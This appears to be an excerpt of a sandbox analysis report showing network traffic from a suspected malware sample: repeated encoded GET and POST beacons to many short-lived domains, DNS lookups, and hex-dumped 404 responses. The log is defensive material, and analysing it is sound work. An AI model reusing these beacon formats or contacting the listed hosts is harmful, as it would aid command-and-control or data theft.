        Source: global trafficHTTP traffic detected: GET /iv79/?vxPD=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&7JH=bvSPlHnHQ4A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.patioprojex.africaUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global trafficHTTP traffic detected: GET /dbbh/?vxPD=lamGMLAlOh98dBGrtynney6GPlHEM5QlQKbLlI7thJxhBrd30wtgMCvSkAg0SEbnfS5+p1L4UOQ6xDYv4dERCKoYatamVnzjD+qK6bhsesKkSZw/Bnu8WzfQ6tLw1Gl2PQ==&7JH=bvSPlHnHQ4A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.huyven.xyzUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global trafficHTTP traffic detected: GET /fbcx/?vxPD=4VtioKF/mjPo/GpRkpc0Qv24mdyWT6seFEVk09A1HDpPAPyqNiGIX689XALIlCi8LzaCpYl7SzxyH3kwVthnk7FHu2LJAC1pbav8pNbFzRj12JkmuKEoiUFHOdUjAAbLgw==&7JH=bvSPlHnHQ4A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dverkom.storeUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global trafficHTTP traffic detected: GET /g48c/?vxPD=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ==&7JH=bvSPlHnHQ4A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bayarcepat19.clickUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global trafficHTTP traffic detected: GET /jo6v/?vxPD=2MtP9xsvcXKXviIsu0vpU2PONZvfmv7hx3sLTV54B3JqqEM7biiUK4O8idRTqEg/3Cvc/KoIDU0zY+SEf5yzUNBsxxGwA99CFGRROpYSVV0FKk6l03kHnIpY1s/MIxOd0w==&7JH=bvSPlHnHQ4A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.wdeb18.topUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global trafficHTTP traffic detected: GET /sfat/?7JH=bvSPlHnHQ4A&vxPD=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9kygqb7/vKRX/BZDIVWlzOZ6s0Fqu7sJ8lUpg5mYkJBBsoyg01CQ+qYMAZnZLVb86DHwbwWbBhRFgOPvzLtNlDmufAw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.galaxyslot88rtp.latUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global trafficHTTP traffic detected: GET /zlyl/?vxPD=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&7JH=bvSPlHnHQ4A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dto20.shopUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global trafficHTTP traffic detected: GET /ni9w/?vxPD=8RaSk5tWi66Sq48MhHZUoNqLIlgjLo7w7AJBRYL2j4srPIRV3wjO+oo3VCeYgIIWRIVLwvpyy/VAIW0MNnFhP5IMZ0bC4qCM9jFMkTpJYlgGjxgR3domNTZU3RfMxSMm9A==&7JH=bvSPlHnHQ4A HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeHost: www.h5hph710am.siteUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
        Source: global trafficDNS traffic detected: DNS query: www.ngmr.xyz
        Source: global trafficDNS traffic detected: DNS query: www.drivedoge.website
        Source: global trafficDNS traffic detected: DNS query: www.fieldelse.net
        Source: global trafficDNS traffic detected: DNS query: www.patioprojex.africa
        Source: global trafficDNS traffic detected: DNS query: www.animekuid.xyz
        Source: global trafficDNS traffic detected: DNS query: www.huyven.xyz
        Source: global trafficDNS traffic detected: DNS query: www.dverkom.store
        Source: global trafficDNS traffic detected: DNS query: www.longfilsalphonse.net
        Source: global trafficDNS traffic detected: DNS query: www.bayarcepat19.click
        Source: global trafficDNS traffic detected: DNS query: www.wdeb18.top
        Source: global trafficDNS traffic detected: DNS query: www.galaxyslot88rtp.lat
        Source: global trafficDNS traffic detected: DNS query: www.dto20.shop
        Source: global trafficDNS traffic detected: DNS query: www.h5hph710am.site
        Source: global trafficDNS traffic detected: DNS query: www.lanxuanz.tech
        Source: unknownHTTP traffic detected: POST /czka/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 205Host: www.drivedoge.websiteOrigin: http://www.drivedoge.websiteReferer: http://www.drivedoge.website/czka/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)Data Raw: 76 78 50 44 3d 54 65 57 66 36 66 70 54 6b 45 66 66 69 4a 67 35 37 58 35 6d 75 65 51 43 6f 58 45 6e 58 61 78 37 6f 33 70 69 62 64 52 6e 33 41 64 68 52 2b 58 62 41 64 41 6a 79 37 75 4b 6f 39 2b 6f 71 6b 37 33 2f 38 63 76 42 34 78 4c 6c 66 65 2b 68 6f 4e 45 72 6d 72 53 70 35 66 61 44 64 34 2f 45 4d 5a 49 66 6a 52 69 46 4e 52 67 78 44 75 78 73 44 33 73 48 50 36 68 34 75 44 43 55 41 4b 6d 68 37 6e 54 58 2f 58 68 69 67 6f 4f 52 67 52 59 66 79 65 49 55 54 54 62 63 6d 2f 4b 32 4e 42 41 2f 4b 6c 44 52 67 78 66 36 64 6d 74 34 37 30 68 42 38 4f 42 78 7a 66 36 6d 72 2b 35 35 35 4c 6d 61 4e 43 70 4b 50 72 78 77 4c 73 3d Data Ascii: vxPD=TeWf6fpTkEffiJg57X5mueQCoXEnXax7o3pibdRn3AdhR+XbAdAjy7uKo9+oqk73/8cvB4xLlfe+hoNErmrSp5faDd4/EMZIfjRiFNRgxDuxsD3sHP6h4uDCUAKmh7nTX/XhigoORgRYfyeIUTTbcm/K2NBA/KlDRgxf6dmt470hB8OBxzf6mr+555LmaNCpKPrxwLs=
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Wed, 30 Oct 2024 04:19:38 GMTX-Varnish: 1439864526Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 75 38 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fu87/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:56:26 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:56:28 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:56:31 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:56:33 GMTContent-Type: text/htmlContent-Length: 634Connection: closeServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 8c 20 d0 bf d1 80 d0 b8 20 d0 bd d0 b0 d0 b1 d0 be d1 80 d0 b5 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d0 b0 2c 20 d0 b8 d0 bb d0 b8 20 d1 81 d1 81 d1 8b d0 bb d0 ba d0 b0 2c 20 d0 bf d0 be 20 d0 ba d0 be d1 82 d0 be d1 80 d0 be d0 b9 20 d0 b2 d1 8b 20 d0 bf d1 80 d0 be d1 88 d0 bb d0 b8 2c 20 d1 83 d1 81 d1 82 d0 b0 d1 80 d0 b5 d0 bb d0 b0 2e 3c 2f 70 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 69 6e 6f 2e 72 75 22 3e d0 94 d0 b6 d0 b8 d0 bd d0 be 3c 2f 61 3e 3c 2f 70 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 70 61 72 6b 69 6e 67 2d 73 74 61 74 69 63 2e 6a 69 6e 6f 2e 72 75 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2e 6a 73 3f 31 2e 32 35 2e 32 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:57:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 03:57:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
